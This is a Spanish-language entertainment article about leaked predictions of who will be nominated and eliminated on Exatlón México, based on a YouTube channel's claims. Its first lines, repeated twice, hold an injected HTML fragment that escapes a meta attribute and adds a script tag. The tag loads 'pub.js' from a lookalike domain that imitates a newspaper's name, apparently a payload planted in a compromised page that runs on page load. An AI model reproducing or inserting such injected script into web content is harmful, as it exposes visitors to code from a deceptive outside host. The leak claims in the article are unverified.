Exatlon México: Conoce quién será el atleta eliminado del próximo 17 de octubre y a los nominados de esta semana.  " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok Exatlon México: Conoce quién será el atleta eliminado del próximo 17 de octubre y a los nominados de esta semana.  " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok

Exatlon México: se filtra al eliminado y a los nominados del próximo 17 de octubre 

¿Quieres saber quién será el eliminado y los nominados de Exatlon México de este domingo?

Por:  Anneth Marín

Exatlón México no ha dejado de filtrarse casi en su totalidad, pues es un programa muy popular y una de las series favoritas de los mexicanos. La quinta temporada no ha sido la excepción y en esta ocasión, ya se ha filtrado quién será el eliminado y los nominados de esta semana. ¿Quieres saber quiénes son?

Los hombres de Guardianes y las mujeres de Conquistradores estarían en peligro de salir de la competencia, por lo que este domingo 17 de octubre habrá un enfrentamiento de un sólo color.

¿Quiénes serán los próximo atletas sentenciados?

 

La primera batalla la ganaron los conquistadores y la segunda los Guardianes por lo que tuvieron que irse a una tercera batalla donde perdió el equipo azul. Karina será la primera sentenciada, pues es la última atleta que se integró y no tiene los puntos suficientes para salvarse. 

La segunda sentenciada será Macky González porque a pesar de que ha mejorado bastante su nivel en las últimas semanas, hay otros integrantes como Marisol, Tania y Dugan que comenzaron a acumular puntos desde el principio. Desde entonces se han mantenido en un nivel alto, posicionándose en los primeros lugares de la lista. Por esta razón, Macky será la próxima sentenciada.

Exatlon México: Karina será la eliminada de esta semana según filtraciones.

La tercera atleta que tendrá que defender su lugar en la competencia será Dugan. Dugan y Tania tienen el mismo nivel, pero como el tercer eliminado depende de los votos del equipo, será Dugan a quien enviarán al duelo de eliminación.

Te puede interesar: Exatlón México: Campeón de una temporada y leyenda de la primera regresarán pronto

¿Quién será el próximo eliminado?

Karina, Dugan y Macky serán las deportistas que se enfrentarán para permanecer en la contienda, pero la próxima eliminada será Karina, pues fue la última en llegar y no tiene oportunidad de superar a fuertes participantes como Marisol, Tania y Dugan. 

Recordemos que se trata de información filtrada obtenida del canal Mago Cósmico de Youtube, por lo que el próximo domingo confirmaremos la salida de Karina y la nominación de Karina, Dugan y Macky.

Te puede interesar: Exatlón México: ¿Quién es el atleta asesinado por el que lloró Héber Gallegos?

Noticias Relacionadas

TE PUEDE INTERESAR

MÁS NOTICIAS

MÁS NOTICIAS